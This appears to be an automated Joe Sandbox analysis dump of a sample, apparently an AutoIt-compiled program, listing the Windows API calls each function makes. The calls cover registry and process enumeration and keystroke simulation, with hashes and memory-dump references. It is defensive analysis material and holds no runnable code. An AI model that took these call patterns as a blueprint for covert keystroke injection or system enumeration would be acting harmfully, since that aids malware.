                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
Similarity
• API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 1457242333-0
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
• MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
• AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
• LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
• CloseFigure.GDI32(?), ref: 0044751F
• SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
• Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2027346449-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenu.USER32 ref: 0047A703
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3257027151-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: ErrorLastselect
• String ID:
• API String ID: 215497628-0
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1729044348-3025626884
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(009C1A48,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(009C1A48,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3300667738-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %lu$\VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3164766367-2432546070
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00433EFD
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
• __wsplitpath.LIBCMT ref: 00433F63
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00433F76
• __wcsicoll.LIBCMT ref: 00433F86
• CloseHandle.KERNEL32(00000000), ref: 00433FBF
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
APIs
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
• EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
• GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
• __wsplitpath.LIBCMT ref: 00433E6D
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00433E80
• __wcsicoll.LIBCMT ref: 00433E90
• CloseHandle.KERNEL32(00000000), ref: 00433EC8
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 135935984-0
APIs
• _malloc.LIBCMT ref: 0041F707
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _free.LIBCMT ref: 0041F71A
Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: [B
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1020059152-632041663
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00413DBD
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00413E07
                                                                                                                                                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 155776804-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
